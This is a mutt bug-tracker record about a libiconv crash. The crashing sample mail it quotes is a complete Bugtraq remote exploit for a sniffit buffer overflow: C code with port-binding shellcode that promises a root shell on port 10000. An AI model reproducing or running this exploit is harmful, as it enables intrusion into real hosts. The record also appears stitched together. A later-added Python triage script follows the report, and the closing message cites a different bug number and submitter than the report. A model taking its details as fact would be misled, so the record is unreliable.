bug#1001: marked as done (mutt-1.3.25i: Further info on previously reported mutt/libiconv coredumps)
Your message dated Sat, 12 Jun 2004 01:55:03 +0100
with message-id <20040612005503.GO12059@xxxxxxxxxxxxxxxxxxxxx>
and subject line Close.
has caused the attached bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Herr der Kaefer
(administrator, GUUG bugs database)
--------------------------------------
Received: (at submit) by bugs.guug.de; 23 Jan 2002 19:15:48 +0000
>From cliftonr@xxxxxxxx Wed Jan 23 20:15:48 2002
Received: from malasada.lava.net ([64.65.64.17]
ident={sAJnn05dukb98Wk9Duep93jKRximnCRp})
by trithemius.gnupg.org with esmtp (Exim 3.12 #1 (Debian))
id 16TSs7-0001H9-00
for <submit@xxxxxxxxxxxx>; Wed, 23 Jan 2002 20:15:47 +0100
Received: from localhost (14138 bytes) by malasada.lava.net; Wed, 23 Jan 2002
09:14:15 -1000 (HST)
via sendmail [stdio] id <m16TSqd-00147TC@xxxxxxxxxxxxxxxxx>
for <submit@xxxxxxxxxxxx>
Message-Id: <m16TSqd-00147TC@xxxxxxxxxxxxxxxxx>
Date: Wed, 23 Jan 2002 09:14:15 -1000 (HST)
From: cliftonr@xxxxxxxx (Clifton Royston)
Subject: mutt-1.3.25i: Further info on previously reported mutt/libiconv
coredumps
To: submit@xxxxxxxxxxxx
Bcc:
Package: mutt
Version: 1.3.25i
Severity: grave
-- Please type your report below this line
Similar to previous report - on viewing a mail, mutt dumps core with
segmentation fault; once again, the stack indicates the crash is in
libiconv (v. 1.7.) Seems to be something to do with handling of
embedded binary characters, possibly when no character set is
specified? Sample mail is included immediately below. (In a bit of
irony, it's a Bugtraq email about shellcode exploits for another piece
of software; while this bug is looking to me more and more like it
could be remotely exploitable.)
In the meantime I'm trying to get mutt 1.2.5.1 to build on this
system, so I can see if it's any more reliable.
-- Mail which kills it:
>From securityfocus.com!bugtraq-return-3331-cliftonr=lava.net Mon Jan 21 18:55:15 2002
Return-Path: <bugtraq-return-3331-cliftonr=lava.net@xxxxxxxxxxxxxxxxx>
Received: from outgoing.securityfocus.com
(outgoing2.securityfocus.com[66.38.151.26]) (8313 bytes) by malasada.lava.net;
Mon, 21 Jan 2002 18:55:13 -1000 (HST)
via sendmail [esmtp] id <m16Ssxl-000wm7b@xxxxxxxxxxxxxxxxx>
for <cliftonr@xxxxxxxx>
Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])
by outgoing.securityfocus.com (Postfix) with QMQP
id C2CD88F2E8; Mon, 21 Jan 2002 21:20:38 -0700 (MST)
Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
Received: (qmail 8666 invoked from network); 19 Jan 2002 18:48:42 -0000
Date: 19 Jan 2002 18:57:03 -0000
Message-ID: <20020119185703.25304.qmail@xxxxxxxxxxxxxxxxxxxxxx>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: <g_463@xxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: remote buffer overflow in sniffit
X-Input: 66.38.151.26
Content-Length: 7058
Lines: 287
/*
Remote overflow in sniffit.0.3.7.beta
tested on slackware 7.1
found/coded by g463
-18th january 2002-
The vulnerability is triggered when the option -L is called from the
command line with 'normmail'
ie : ./sniffit -c ./sample_config_file -L normmail
It calls a piece of code where the buffer is unchecked
//From sniffit.0.3.7.beta/sn_logfile.c
void print_mail (char *conn, char *msg)
{
char line[250];
sprintf(line,"%s: mail [%s]",conn,msg);
print_logline (line);
}
- In a normal situation, it could be easier to fill line[250] with our
shellcode, but since this buffer gets filtered with some kind of
strlower() function (thus our shellcode/return address too), i rely
on an unfiltered buffer with the same data so we can point eip back
at that place with clean, unmodified shellcode :D
All my brothers (alphabetical order) : Erebus, Jinx, mtadbf, nitr0gen, Slink[e]
+ some others i forget :p
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <error.h>
#include <string.h>
#define SMTP_PORT 25
#define MAX_LINE 256
#define BUFLEN 252
//define this to your ip
#define MY_IP "192.168.0.1"
//Value for overwriting eip
//should be the address of the data buffer + some couple of garbage bytes
#define RETADR 0x08059408
//Port binding shellcode, binds on port 10000
//taken from bighawk@xxxxxxxxxxx
char shellcode[] =
"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x89\xe5" // mov ebp, esp
"\x99" // cdq
"\xb0\x66" // mov al, 102
"\x89\x5d\xfc" // mov [ebp-4], ebx
"\x43" // inc ebx
"\x89\x5d\xf8" // mov [ebp-8], ebx
"\x43" // inc ebx
"\x89\x5d\xf4" // mov [ebp-12], ebx
"\x4b" // dec ebx
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\x45\xf4" // mov [ebp-12], eax
"\x43" // inc ebx
"\x66\x89\x5d\xec" // mov [ebp-20], bx
"\x66\xc7\x45\xee\x27\x10" // mov [ebp-18], word 4135
"\x89\x55\xf0" // mov [ebp-16], edx
"\x8d\x45\xec" // lea eax, [ebp-20]
"\x89\x45\xf8" // mov [ebp-8], eax
"\xc6\x45\xfc\x10" // mov [ebp-4], byte 16
"\xb2\x66" // mov dl, 102
"\x89\xd0" // mov eax, edx
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\xd0" // mov eax, edx
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x43" // inc ebx
"\x89\xd0" // mov eax, edx
"\x99" // cdq
"\x89\x55\xf8" // mov [ebp-8], edx
"\x89\x55\xfc" // mov [ebp-4], edx
"\xcd\x80" // int 80h
"\x31\xc9" // xor ecx, ecx
"\x89\xc3" // mov ebx, eax
"\xb1\x03" // mov cl, 3
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop -7
"\x52" // push edx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x52" // push edx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
int usage (char *);
int calculate_conn_lenght (struct sockaddr_in, struct sockaddr_in);
int
main (int argc, char *argv[])
{
struct sockaddr_in stServer, stClient;
char *ptHost;
unsigned long int iHost;
int iSockfd, iLenght, iAlign = 0;
char sBuffer[MAX_LINE];
char sString[300];
int i;
if (argc != 2) usage (argv[0]);
ptHost = argv[1];
if ( (iHost = inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Invalid host or host is 255.255.255.255\n");
exit (-1);
}
//Fill the server struct
memset (&stServer, 0, sizeof (struct sockaddr_in));
stServer.sin_family = AF_INET;
stServer.sin_port = htons (SMTP_PORT);
stServer.sin_addr.s_addr = iHost;
if ( (iSockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
printf ("Error opening socket\n");
exit (-1);
}
// Fill the client struct, mainly used to calculate the right align for RET addy
memset (&stClient, 0, sizeof (struct sockaddr_in));
stClient.sin_family = AF_INET;
stClient.sin_port = htons (0);
stClient.sin_addr.s_addr = inet_addr (MY_IP);
if ( (bind (iSockfd, (struct sockaddr *) &stClient, sizeof (stClient))) == -1 ) {
perror ("Cant bind socket");
exit (-1);
}
iAlign = calculate_conn_lenght (stClient, stServer);
i = BUFLEN - iAlign + 4;
if ( (connect (iSockfd, (struct sockaddr *) &stServer, sizeof (stServer))) != 0) {
perror ("Cant connect");
exit (-1);
}
else printf ("Connected to host %s on port %d\n\n", ptHost, SMTP_PORT);
// Receive the smtp server's banner
if ( (iLenght = recv (iSockfd, sBuffer, MAX_LINE, 0)) == -1) {
perror ("Cant get server banner");
exit (-1);
}
printf ("%s\n", sBuffer);
printf ("Building evil string... >:)\n");
memset (sString, 0x90, sizeof (sString));
memcpy (sString, "mail from:", strlen ("mail from:"));
memcpy(sString + i - strlen (shellcode), shellcode, strlen (shellcode));
sString[i++] = (RETADR & 0x000000ff);
sString[i++] = (RETADR & 0x0000ff00) >> 8;
sString[i++] = (RETADR & 0x00ff0000) >> 16;
sString[i++] = (RETADR & 0xff000000) >> 24;
sString[i] = '\0';
if ( (send (iSockfd, sString, strlen (sString), 0)) == -1) {
perror ("cant send message");
exit (-1);
}
printf ("Evil string sent!\n");
printf ("Try telneting the host on port 10000 for r00t shell!\n");
close (iSockfd);
return (0);
}
int usage (char *progname)
{
printf ("%s <ip>\n", progname);
exit (-1);
}
/*
function to calculate conn entry lenght
ie : strlen of ("192.168.0.1.1024-192.168.0.69.25");
(fuckin dirty but heh it works)
*/
int calculate_conn_lenght (struct sockaddr_in me, struct sockaddr_in him)
{
int lenght = 0;
struct in_addr in;
in.s_addr = me.sin_addr.s_addr;
lenght += strlen (inet_ntoa (in)); // 192.168.0.1
lenght++; // .
lenght += 4; // 1220
lenght ++; // .
in.s_addr = him.sin_addr.s_addr;
lenght += strlen (inet_ntoa (in)); // 192.168.0.69
lenght++; // .
lenght += 2; // 25
lenght += strlen (": mail [");
return (lenght);
}
-- Build environment information
(Note: This is the build environment installed on the system
muttbug is run on. Information may or may not match the environment
used to build mutt.)
- gcc version information
gcc
Using builtin specs.
gcc version egcs-2.91.66 19990314 (egcs-1.1.2 release)
- CFLAGS
-Wall -pedantic -g -O2
-- Mutt Version Information
Mutt 1.3.25i (2002-01-01)
Copyright (C) 1996-2001 Michael R. Elkins and others.
Mutt comes with ABSOLUTELY NO WARRANTY; for details type `mutt -vv'.
Mutt is free software, and you are welcome to redistribute it
under certain conditions; type `mutt -vv' for details.
System: BSD/OS 4.1 (i386) [using ncurses 5.0]
Compile options:
-DOMAIN
+DEBUG
-HOMESPOOL -USE_SETGID +USE_DOTLOCK -DL_STANDALONE
+USE_FCNTL -USE_FLOCK
-USE_POP +USE_IMAP -USE_GSS +USE_SSL -USE_SASL
+HAVE_REGCOMP -USE_GNU_REGEX
+HAVE_COLOR +HAVE_START_COLOR +HAVE_TYPEAHEAD +HAVE_BKGDSET
+HAVE_CURS_SET +HAVE_META +HAVE_RESIZETERM
+HAVE_PGP -BUFFY_SIZE -EXACT_ADDRESS -SUN_ATTACHMENT
+ENABLE_NLS -LOCALES_HACK -HAVE_WC_FUNCS -HAVE_LANGINFO_CODESET
-HAVE_LANGINFO_YESEXPR
+HAVE_ICONV -ICONV_NONTRANS -HAVE_GETSID +HAVE_GETADDRINFO
ISPELL="/usr/contrib/bin/ispell"
SENDMAIL="/usr/sbin/sendmail"
MAILPATH="/var/mail"
PKGDATADIR="/usr/local/share/mutt"
SYSCONFDIR="/usr/local/etc"
EXECSHELL="/bin/sh"
-MIXMASTER
To contact the developers, please mail to <mutt-dev@xxxxxxxx>.
To report a bug, please use the flea(1) utility.
-- Core Dump Analysis Output
GNU gdb
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-bsdi4.1"...
Core was generated by `mutt'.
Program terminated with signal 11, Segmentation fault.
#0 0x481f8477 in libiconv ()
#0 0x481f8477 in libiconv ()
#1 0x808de9c in mutt_iconv (cd=0x74616c75, inbuf=0x80459a8,
inbytesleft=0x80459ac, outbuf=0x80459b0, outbytesleft=0x80459b4,
inrepls=0x0, outrepl=0x80a95d0 "?") at charset.c:353
#2 0x80636d6 in convert_to_state (cd=0x74616c75,
bufi=0x80461b8 "\212re du serveur smtp\n if ( (iLenght = recv (iSockfd,
sBuffer, MAX_LINE, 0)) \n== -1) {\n \n perror (\"Cant get server
banner\");\n exit (-1); \n\n }\n printf (\"%s\\n\", sBuffer); \n\n
printf "..., l=0x80461b4, s=0x80468b8) at handler.c:109
#3 0x80637f6 in mutt_decode_xbit (s=0x6e6f6974, len=544175136,
istext=1668047203, cd=0x74616c75) at handler.c:146
#4 0x636e7566 in ?? ()
Cannot access memory at address 0x2020200a.
(gdb)
--- Begin /home/staff/cliftonr/.muttrc
set alias_file=~/.aliases
source ~/.aliases
subscribe cricket-users
subscribe social-l jokes-l crude-l
subscribe onc-members
subscribe crypto-gram
subscribe geek
subscribe hix-l
subscribe webmasters-l
subscribe blackbook-l
subscribe members@xxxxxxxxxxxx
subscribe susie@xxxxxxxxxxxxxxx
subscribe cricket
subscribe qpopper
subscribe rrd
subscribe wordsmith
subscribe freebsd
subscribe openbsd
set alternates="cliftonr@.*"
set hostname="lava.net"
set record="=sent"
set mbox="=received"
set save_name askcc beep_new hidden_host
set delete=ask-yes
set move=ask-no
set pager_context=1
set sort=threads
set sort_aux=date
set to_chars=" TtcF"
set forward_format="(Fwd) %s"
set forward_quote
unset wrap_search save_empty
mono tree bold
mono status reverse
mono search bold
mono index underline ~N
mono index none ~l
mono index bold ~Csystem@lava
mono error standout
color tree yellow default
color status white blue
color search yellow default
color index green default ~N
color index blue default ~l
mono index bold ~Csystem@lava
color index red default ~Csystem@lava
color error white red
macro pager y iy
bind generic X exit
bind generic \^ first-entry
bind generic $ last-entry
bind generic < previous-page
bind generic > next-page
bind pager \^ top
bind pager $ bottom
bind index x exit
bind index $ last-entry
bind index \Cl sync-mailbox
bind index = sync-mailbox
macro index Q q^M^M
macro index \cb |urlview\n
macro pager \cb |urlview\n
auto_view text/html
--- End /home/staff/cliftonr/.muttrc
--- Begin /usr/local/etc/Muttrc
ignore "from " received content- mime-version status x-status message-id
ignore sender references return-path lines
macro index \eb '/~b ' 'search in message bodies'
macro index \cb |urlview\n 'call urlview to extract URLs out of a message'
macro pager \cb |urlview\n 'call urlview to extract URLs out of a message'
macro generic <f1> "!less /usr/local/doc/mutt/manual.txt\n" "Show Mutt documentation"
macro index <f1> "!less /usr/local/doc/mutt/manual.txt\n" "Show Mutt documentation"
macro pager <f1> "!less /usr/local/doc/mutt/manual.txt\n" "Show Mutt documentation"
--- End /usr/local/etc/Muttrc
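Added triage example (not part of the bug report, and not mutt's or sniffit's code): the argument values in frames #3 and #4 of the backtrace above look like ASCII rather than pointers or lengths. This script reinterprets each 32-bit value as the four bytes it occupies on a little-endian i386 stack, in stack order (saved return address, then the arguments s, len, istext, cd of mutt_decode_xbit), and looks for the recovered string in a constructed copy of one comment line from the sample mail. That is the check that separates a stack frame overwritten by message data from an ordinary bad-pointer crash.

```python
import struct

# Values copied from the gdb backtrace in the bug report (frame #4's pc and
# frame #3's arguments), listed in ascending i386 stack order: the saved
# return address sits just below the first argument, and the arguments
# follow in declaration order.
BACKTRACE_WORDS = [
    ("frame #4 pc", 0x636e7566),
    ("mutt_decode_xbit s", 0x6e6f6974),
    ("mutt_decode_xbit len", 544175136),
    ("mutt_decode_xbit istext", 1668047203),
    ("mutt_decode_xbit cd", 0x74616c75),
]
FAULT_ADDRESS = 0x2020200a  # from "Cannot access memory at address 0x2020200a"

# Constructed copy of one comment line from the sample mail that crashed mutt.
SAMPLE_MAIL_LINE = "function to calculate conn entry lenght"


def word_to_ascii(word):
    """Reinterpret a 32-bit value as the 4 bytes it occupies on a little-endian stack."""
    return struct.pack("<I", word).decode("latin-1")


def is_text(chunk):
    """True if every byte is printable ASCII or whitespace, i.e. plausibly message text."""
    return all(c in "\n\r\t" or 0x20 <= ord(c) < 0x7f for c in chunk)


def recover_stack_text(words):
    """Join the decoded words; return None if any word looks like a real pointer."""
    chunks = [word_to_ascii(w) for _, w in words]
    if not all(is_text(c) for c in chunks):
        return None
    return "".join(chunks)


def find_in_message(text, message):
    """Offset of the recovered text in the message body, or -1 if it is not there."""
    return message.find(text)


if __name__ == "__main__":
    recovered = recover_stack_text(BACKTRACE_WORDS)
    print("stack words decode to:", repr(recovered))
    print("fault address decodes to:", repr(word_to_ascii(FAULT_ADDRESS)))
    print("offset in sample mail:", find_in_message(recovered, SAMPLE_MAIL_LINE))
```

On this trace the five words decode to "function to calculat", found at offset 0 of the sample comment line, and the faulting address decodes to a newline followed by three spaces, so the saved return address and arguments were overwritten with the body of the message being displayed.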
---------------------------------------
Received: (at 1161-done) by bugs.guug.de; 12 Jun 2004 00:53:11 +0000
>From paul@xxxxxxxxxxxxxxxxxxxxx Sat Jun 12 02:53:09 2004
Received: from anchor-post-31.mail.demon.net ([194.217.242.89])
by trithemius.gnupg.org with esmtp (Exim 3.35 #1 (Debian))
id 1BYwlh-0005xU-00
for <1161-done@xxxxxxxxxxxx>; Sat, 12 Jun 2004 02:53:09 +0200
Received: from black-sun.demon.co.uk ([212.228.147.62] helo=nova)
by anchor-post-31.mail.demon.net with esmtp (Exim 3.35 #1)
id 1BYwof-0001Bc-0V
for 1161-done@xxxxxxxxxxxx; Sat, 12 Jun 2004 01:56:17 +0100
Received: from paul
by nova with local id 1BYwnh-00053J-HG
for <1161-done@xxxxxxxxxxxx>; Sat, 12 Jun 2004 01:55:13 +0100
Date: Sat, 12 Jun 2004 01:55:03 +0100
From: Paul Walker <paul@xxxxxxxxxxxxxxxxxxxxx>
To: 1161-done@xxxxxxxxxxxx
Subject: Close.
Message-ID: <20040612005503.GO12059@xxxxxxxxxxxxxxxxxxxxx>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="s9fJI615cBHmzTOP"
Content-Disposition: inline
User-Agent: Mutt/1.5.5.1+cvs20040105i
X-Spam-Status: No, hits=-107.0 required=4.0
tests=AWL,BAYES_20,PGP_SIGNATURE_2,USER_AGENT_MUTT,
USER_IN_WHITELIST
autolearn=ham version=2.55
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)
--s9fJI615cBHmzTOP
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Cannot reproduce; original submitter no longer seems to be contactable at
any of joop@xxxxxxxxxxxx, joop@xxxxxx, or joop@xxxxxxxxxxxxxx
Robert - if I missed one and you're still seeing the problem, I apologise,
and we can re-open the bug. :-)
-- 
Paul
--s9fJI615cBHmzTOP
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFAylRnP9fOqdxRstoRAqByAKCfOhhgO/GDS9wBFbexRRCU4fKQigCffPYM
VNPvFcTpTh/W+96BKfRKjSI=
=tjJM
-----END PGP SIGNATURE-----
--s9fJI615cBHmzTOP--